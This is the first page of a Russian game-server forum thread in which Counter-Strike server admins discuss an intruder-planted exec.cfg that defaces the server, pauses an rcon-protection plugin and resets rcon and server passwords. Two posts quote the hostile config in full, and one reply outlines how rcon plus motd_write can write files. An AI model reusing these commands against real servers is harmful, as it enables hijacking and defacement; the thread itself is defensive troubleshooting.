Правила форума Гаранты форума
Размещение рекламы AMX-X компилятор

Здравствуйте, гость Вход | Регистрация

Наши новости:

14-дек
24-апр
10-апр
11-апр

> Важная информация

Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.
23 страниц V   1 2 ... 21 22 »

Залили на сервер exec.cfg

Статус пользователя Shurik_7773.cfg
сообщение 10.12.2012, 12:13
Сообщение #1


Стаж: 13 лет

Сообщений: 80
Благодарностей: 8
Полезность: 82

Каким-то образом залили мне в сервер по пути HLDS\cstrike\addons\metamod файл exec.cfg
Со следующим содержимым:
Код
hostname "nPuBeT oT Madotsuki;)"
motdfile motd.txt
motd_write <html><head><title>/mado/ was here</title></head><body><img src="http://plasmon.rghost.ru/********/image.png" width="100%" height="100%" border="0" align="center"></body></html>
amxx pause rcon_defencer.amxx
rcon_password madotsuki

У меня скачка с сервера запрещена , карты качают только с web servera , платформа последняя , стоит ещё upatch русский чат довольно не давно поставил , плагинов с бекдором вроде нет , всё что новое ставлю всё проверяю в ручную .
Ещё в папку configs залили папку maps с cfg-шками такого же содержания .

Отредактировал: mazdan, - 10.12.2012, 21:47
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 2 раз
   Цитировать сообщение
Статус пользователя mazdan
сообщение 10.12.2012, 12:21
Сообщение #2


Иконка группы

Стаж: 15 лет

Сообщений: 7566
Благодарностей: 5437
Полезность: 1305

Видео очень помогает :D
Похоже на бекдор какой-то, типа как CaseSensExt =) Но раз скачка с сервера отключена, то надо смотреть
Хорошо бы видеть (можно в ЛС):
логи за дату создания файла exec.cfg
А так же meta list, amxx cmds, amx_plugins


Не пишите мне в ЛС. Пишите на почту. В ЛС я пропускаю сообщения.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя oleg826
сообщение 10.12.2012, 12:40
Сообщение #3


Стаж: 13 лет

Сообщений: 484
Благодарностей: 126
Полезность: 510

Что-то новое?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
umprex
сообщение 10.12.2012, 12:48
Сообщение #4


Иконка группы

Стаж: 16 лет
Город: Киев

Сообщений: 2909
Благодарностей: 4781
Полезность: 2197

А еще можно пароль от фтп поменять.


Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Shurik_7773.cfg
сообщение 10.12.2012, 12:57
Сообщение #5


Стаж: 13 лет

Сообщений: 80
Благодарностей: 8
Полезность: 82

Цитата(mazdan @ 10.12.2012, 12:21) *
Видео очень помогает :D
Похоже на бекдор какой-то, типа как CaseSensExt =) Но раз скачка с сервера отключена, то надо смотреть
Хорошо бы видеть (можно в ЛС):
логи за дату создания файла exec.cfg
А так же meta list, amxx cmds, amx_plugins


пацаны я сейчас пьяный , просплюсь отпишусь норм , логи на сервере отключены .
если ещё это произойдёт , то логирование включу посмортим что там пишут .
на данный момент те плагины что последние добовлял отключил их .
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
cs-portal
сообщение 10.12.2012, 13:03
Сообщение #6
Стаж: 16 лет

Сообщений: 8181
Благодарностей: 2709
Полезность: 0

вы что шутите
какой фтп / какой бекдор... сбрутили видимо ркон и поехало
либо очень простой вариант - любой админ пишет в консоли amx_cvar rcon_password и видит ркон и потом сливает за рубасы челу и все

далее юзаем motdfile и write и создаем файл на сервере. вот и вся сказка
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 1 раз
   + Цитировать сообщение
Статус пользователя mazdan
сообщение 10.12.2012, 13:23
Сообщение #7


Иконка группы

Стаж: 15 лет

Сообщений: 7566
Благодарностей: 5437
Полезность: 1305

да всякое может быть.


Не пишите мне в ЛС. Пишите на почту. В ЛС я пропускаю сообщения.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
WMP
сообщение 10.12.2012, 17:01
Сообщение #8
Стаж: 13 лет

Сообщений: 272
Благодарностей: 50
Полезность: 0

Давно пора какбэ убрать этот rcon password :) Устарела эта тема =)
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя darko19
сообщение 10.12.2012, 17:33
Сообщение #9


Стаж: 14 лет

Сообщений: 80
Благодарностей: 5
Полезность: 46

у меня тоже самое! это какой то новый сплоит
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя coolman
сообщение 10.12.2012, 17:45
Сообщение #10


Стаж: 19 лет
Город: Екатеринбург

Сообщений: 1220
Благодарностей: 218
Полезность: 149

сервер запилили rofl.gif пойду гляну че у меня творится, а вдруг? psych.gif
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя darko19
сообщение 10.12.2012, 17:46
Сообщение #11


Стаж: 14 лет

Сообщений: 80
Благодарностей: 5
Полезность: 46

я уже вроде разобрался с проблемой
как, пока отписываться не буду :) мало ли не прокатит
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя 3aB}{o3
сообщение 10.12.2012, 21:10
Сообщение #12


Стаж: 18 лет

Сообщений: 2145
Благодарностей: 825
Полезность: 521

У меня тоже :

exec.cfg
// Привет от Мадоцуки ;)

hostname "Madotsuki 6blJIa 3gecb ;)"
motdfile motd.txt
motd_write <html><head><title>/mado/ was here</title></head><body><img src="http://plasmon.rghost.ru/38955366/image.png" width="100%" height="100%" border="0" align="center"></body></html>

amxx pause rcon_defencer.amxx

rcon_password madotsuki
sv_password ""

// А еще здесь был [2010] KOHTEP.
// youtube.com/watch?v=a01FnVVosx8#t=27s
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя perfectblood0
сообщение 10.12.2012, 21:14
Сообщение #13
Стаж: 17 лет

Сообщений: 5065
Благодарностей: 2685
Полезность: 488

ОО мадацуки уже и здесь
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя fake8833
сообщение 10.12.2012, 21:15
Сообщение #14
Стаж: 14 лет

Сообщений: 80
Благодарностей: 16
Полезность: 158

Может не в тему и опозорюсь
Код
;pausecfg.amxx        ; allows to pause and unpause some plugins

и доступ цваров плагинов убрать

Отредактировал: fake8833, - 10.12.2012, 21:16
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя 3aB}{o3
сообщение 10.12.2012, 21:15
Сообщение #15


Стаж: 18 лет

Сообщений: 2145
Благодарностей: 825
Полезность: 521

plugins.ini
autobuyfix.amxx
simple_redirection.amxx
ksg.amxx
colorchat.amxx
amx_demorecorder.amxx
Map_Spawns_Editor.amxx
realradioreborn.amxx
vip.amxx
Descriptive_Fire_in_the_hole.amxx
zp_parachute.amxx
statsx_shell.amxx
acc.amxx
topawards.amxx
admin_freelook.amxx
admin_esp_mini.amxx
amx_gore_ultimate.amxx
psychosounds.amxx
amx_ip.amxx
afkbombtransfer.amxx
antireconnect.amxx
bloodyknife.amxx
knife_round.amxx
grentrail.amxx
IconsColorChanger.amxx
c4cdvoice.amxx
ad_manager.amxx
resetscore.amxx
death_weapons_drop.amxx
voteban.amxx
nice_kicker.amxx
no_changename.amxx
weather_system.amxx
weaponphys.amxx
fullupdate.amxx
pingfaker.amxx
AntiBlocker.amxx
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя fake8833
сообщение 10.12.2012, 21:32
Сообщение #16
Стаж: 14 лет

Сообщений: 80
Благодарностей: 16
Полезность: 158

3aB}{o3,
http://amx-x.ru/viewtopic.php?f=11&t=1...t=rcon_defencer
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
kreat1ff
сообщение 10.12.2012, 21:40
Сообщение #17
Стаж: 15 лет

Сообщений: 1780
Благодарностей: 640
Полезность: 0

половина румын ночью была взломана))
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
cs-portal
сообщение 10.12.2012, 21:40
Сообщение #18
Стаж: 16 лет

Сообщений: 8181
Благодарностей: 2709
Полезность: 0

ето в папке метамод??? ну пока все тихо
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя 3aB}{o3
сообщение 10.12.2012, 21:45
Сообщение #19


Стаж: 18 лет

Сообщений: 2145
Благодарностей: 825
Полезность: 521

Цитата(fake8833 @ 10.12.2012, 23:32) *


На сервере ркона вообще нет
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя oleg826
сообщение 10.12.2012, 21:50
Сообщение #20


Стаж: 13 лет

Сообщений: 484
Благодарностей: 126
Полезность: 510

У себя не наблюдал пока, если новый сплойт то все ждать защиту придется. Херово
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
23 страниц V   1 2 ... 21 22 »
 
Ответить в данную темуНачать новую тему
 
0 пользователей и 1 гостей читают эту тему: